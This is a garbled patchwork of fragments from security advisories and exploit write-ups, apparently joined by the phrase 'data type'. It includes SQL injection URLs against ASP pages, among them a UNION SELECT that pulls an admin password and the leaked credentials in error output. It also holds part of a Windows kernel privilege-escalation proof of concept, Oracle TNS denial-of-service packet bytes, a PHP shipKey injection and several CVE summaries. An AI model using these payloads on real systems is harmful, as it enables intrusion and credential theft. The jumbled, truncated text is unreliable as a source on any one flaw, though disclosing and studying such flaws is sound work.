data type
case NOERROR:
if (hp->ancount) {
...
<many fine test etc>
...
switch (qdatatype) {
case T_PTR:
if (!Is_PTR(rp))
if (debug) {
restell("Resolver warning: Ignoring response with unexpected query type \"PTR\".");
return;
Requesting the following URL returns the version of Windows and SQL server:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
Other URLs:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"
"2010-5-23\n"
"By Lincoin \n\nPress Enter");
HKEY hkey;
WCHAR InstallPath[MAX_PATH];
DWORD datatype;
DWORD datasize = MAX_PATH * sizeof(WCHAR);
ULONG oldlen;
PVOID pOldBufferData = NULL;
if (RegOpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)
Vulnerability Table
===================
1. CA Erwin Datatype Standards File Denial of Service Vulnerability
2. G DATA Antivirus SelectPath() ScanObjectBrowser.dll Buffer Overflow Vulnerability
3. CA eTrust ITM r8.1 Web Console Script Redirection Vulnerability
SQL error returned (notice the username 'adminuser'):
"Syntax error converting the varchar value 'adminuser' to a column of
data type int."
SQL error returned (notice the password 'p4ssw0rd!!'):
https://target.foo/progress/PasswordReminder.asp?ReminderButton=Submit&UserName='+union+select+min(Login.Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+Login+where+Login.UserName='adminuser'--
libjasper/jpc/jpc_cs.c in JasPer 1.900.1 allows remote attackers to
execute arbitrary code or cause a denial of service (memory corruption)
via a crafted numrlvls value in a JPEG2000 file (CVE-2011-4516).
The jpc_crg_getparms function in libjasper/jpc/jpc_cs.c in JasPer
1.900.1 uses an incorrect data type during a certain size calculation,
which allows remote attackers to trigger a heap-based buffer overflow
and execute arbitrary code, or cause a denial of service (heap memory
corruption), via a malformed JPEG2000 file (CVE-2011-4517).
The updated packages have been patched to correct these issues.
Returns:
"Error retrieving password reminder. Syntax error converting the nvarchar
value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53
Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2
(Build 3790: Service Pack 2) ' to a column of data type int."
Recommendation:
Vendor refused to comment on whether they would develop a patch or even notify
the existing client base.
The BigDecimal library in Ruby 1.8.6 before p369 and 1.8.7 before
p173 allows context-dependent attackers to cause a denial of service
(application crash) via a string argument that represents a large
number, as demonstrated by an attempted conversion to the Float
data type.
This update corrects the problem.
_______________________________________________________________________
References:
In other, probably more recent versions, a 13-column query is required
for the UNION. What does not change is that of all of the various
versions I've encountered, all are vulnerable to SQL injection.
The ideal fix would be to ensure that the 'node_id' request variable is
the appropriate data-type (signed int) before passing it as part of a
SQL query.
Vendor Status:
A private ticket was created on the vendor's Bug Tracker page prior to
this release. However, I have decided to release this vulnerability
The following vulnerabilities were reported in all mentioned Mozilla
products:
* TippingPoint's Zero Day Initiative reported that an incorrect
integer data type is used as a CSS object reference counter, leading
to a counter overflow and a free() of in-use memory (CVE-2008-2785).
* Igor Bukanov, Jesse Ruderman and Gary Kwong reported crashes in the
JavaScript engine, possibly triggering memory corruption
(CVE-2008-2799).
by a server in a post-renegotiation context, related to a plaintext
injection attack, aka the Project Mogul issue (CVE-2009-3555).
The gnutls_x509_crt_get_serial function in the GnuTLS library before
1.2.1, when running on big-endian, 64-bit platforms, calls the
asn1_read_value with a pointer to the wrong data type and the wrong
length value, which allows remote attackers to bypass the certificate
revocation list (CRL) check and cause a stack-based buffer overflow
via a crafted X.509 certificate, related to extraction of a serial
number (CVE-2010-0731).
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.
The specific flaw exists within the implementation of web worker
threads. Due to mishandling the array data type while processing posted
messages, a web worker thread can be made to corrupt heap memory. An
attacker can exploit this vulnerability to execute arbitrary code under
the context of the user running the browser.
-- Vendor Response:
the CPU's time introducing a Denial of Service condition.
Details
*******
Once a client connects to the database process and performs protocol
negotiation (TNS packet type 1) and data type representation (packet type 2),
it may then send packets of type 6 - Data packets. If the server gets a
packet with the 2nd bit of the Data flags set, then the server runs at
100% CPU:
"\x00\x1D" // Packet Size
quan%5B3afcdbfeb6ecfbdd0ba628696e3cc163%5D=3&shipKey=1'&coupon=
- -----/
This happens because the 'shipKey' is assumed to be of the 'int'
datatype, and is neither cast nor checked before being sent to the database, as
we can see in the following code snippet:
/-----
if(isset($_POST['shipKey']) && $_POST['shipKey']>0) {
$cart->setVar($_POST['shipKey'],'shipKey');
The BigDecimal library in Ruby 1.8.6 before p369 and 1.8.7 before
p173 allows context-dependent attackers to cause a denial of service
(application crash) via a string argument that represents a large
number, as demonstrated by an attempted conversion to the Float data
type (CVE-2009-1904).
Packages for 2008.0 are being provided due to extended support for
Corporate products.
This update provides a solution to these vulnerabilities.
##########################################################
Description:
Jamroom is a popular online social media CMS used to host artist sites
and create music communities. It is vulnerable to a flaw in datatype
comparison that allows an attacker to bypass the authentication
process completely and gain access to any account with only a username.
This vulnerability has been patched in the latest version of JamRoom and
all users are encouraged to upgrade as soon as possible.
epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows
remote attackers to execute arbitrary code via a crafted .pcap file
(CVE-2011-1591).
The NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x
before 1.4.5 on Windows uses an incorrect integer data type during
decoding of SETCLIENTID calls, which allows remote attackers to cause
a denial of service (application crash) via a crafted .pcap file
(CVE-2011-1592).
The updated packages have been upgraded to the latest 1.2.x version